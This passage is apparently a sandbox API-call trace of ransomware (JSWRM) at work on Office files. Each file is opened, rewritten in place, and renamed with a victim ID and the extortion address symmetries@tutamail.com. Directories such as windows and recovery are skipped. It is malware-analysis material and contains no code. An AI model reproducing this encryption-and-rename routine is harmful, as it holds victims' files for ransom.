lpWideCharStr="POSTCD98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCD98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTCD98.POC", lpUsedDefaultChar=0x0) returned 12 [0142.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0142.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0142.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCD98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCD98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTCD98.POC", lpUsedDefaultChar=0x0) returned 12 [0142.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0142.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0142.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0142.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0142.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCD98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcd98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.614] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=689384) returned 1 [0142.614] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0142.614] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.627] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.627] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0142.627] CloseHandle (hObject=0x238) returned 1 [0142.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0142.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0142.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0142.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0142.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0142.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0142.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.628] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCD98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcd98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCD98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcd98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0142.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0142.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0142.630] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233cee41, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233cee41, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2341b2ec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf86, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PROG98.POC", cAlternateFileName="")) returned 1 [0142.630] lstrcmpiW (lpString1="PROG98.POC", lpString2=".") returned 1 [0142.630] lstrcmpiW (lpString1="PROG98.POC", lpString2="..") returned 1 [0142.631] lstrcmpiW (lpString1="PROG98.POC", lpString2="...") returned 1 [0142.631] lstrcmpiW (lpString1="PROG98.POC", lpString2="windows") returned -1 [0142.631] lstrcmpiW (lpString1="PROG98.POC", lpString2="recovery") returned -1 [0142.631] lstrcmpiW (lpString1="PROG98.POC", lpString2="perflogs") returned 1 [0142.631] lstrcmpiW (lpString1="PROG98.POC", lpString2="documents and settings") returned 1 [0142.631] lstrcmpiW (lpString1="PROG98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.631] lstrcmpiW (lpString1="PROG98.POC", lpString2="system volume information") returned -1 [0142.631] lstrcmpiW (lpString1="PROG98.POC", lpString2="msocache") returned 1 [0142.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0142.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROG98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROG98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROG98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0142.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0142.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROG98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROG98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROG98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0142.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0142.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0142.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0142.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PROG98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\prog98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.632] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=44934) returned 1 [0142.632] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaf80) returned 0x27b348 [0142.632] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xaf80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xaf80, lpOverlapped=0x0) returned 1 [0142.637] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.637] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xaf80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xaf80, lpOverlapped=0x0) returned 1 [0142.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0142.637] CloseHandle (hObject=0x238) returned 1 [0142.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0142.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0142.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0142.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0142.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0142.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0142.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0142.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0142.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.637] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PROG98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\prog98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PROG98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\prog98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0142.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0142.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0142.639] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2341b2ec, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2341b2ec, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2341b2ec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PROGRAM.DPV", cAlternateFileName="")) returned 1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2=".") returned 1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2="..") returned 1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2="...") returned 1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2="windows") returned -1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2="recovery") returned -1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2="perflogs") returned 1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2="documents and settings") returned 1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2="$RECYCLE.BIN") returned 1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2="system volume information") returned -1 [0142.639] lstrcmpiW (lpString1="PROGRAM.DPV", lpString2="msocache") returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0142.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROGRAM.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROGRAM.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROGRAM.DPV", lpUsedDefaultChar=0x0) returned 11 [0142.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0142.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROGRAM.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROGRAM.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROGRAM.DPV", lpUsedDefaultChar=0x0) returned 11 [0142.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0142.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0142.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0142.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0142.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PROGRAM.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\program.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.640] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9728) returned 1 [0142.640] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2600) returned 0x27b348 [0142.640] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2600, lpOverlapped=0x0) returned 1 [0142.642] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.642] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2600, lpOverlapped=0x0) returned 1 [0142.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0142.642] CloseHandle (hObject=0x238) returned 1 [0142.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0142.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0142.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0142.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0142.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0142.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0142.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0142.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0142.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0142.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0142.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PROGRAM.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\program.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PROGRAM.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\program.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0142.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0142.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0142.644] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233cee41, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233cee41, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233cee41, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PROGRAM.XML", cAlternateFileName="")) returned 1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2=".") returned 1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2="..") returned 1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2="...") returned 1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2="windows") returned -1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2="recovery") returned -1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2="perflogs") returned 1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2="documents and settings") returned 1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2="$RECYCLE.BIN") returned 1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2="system volume information") returned -1 [0142.644] lstrcmpiW (lpString1="PROGRAM.XML", lpString2="msocache") returned 1 [0142.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0142.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROGRAM.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROGRAM.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROGRAM.XML", lpUsedDefaultChar=0x0) returned 11 [0142.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0142.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0142.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROGRAM.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROGRAM.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROGRAM.XML", lpUsedDefaultChar=0x0) returned 11 [0142.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0142.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0142.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0142.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 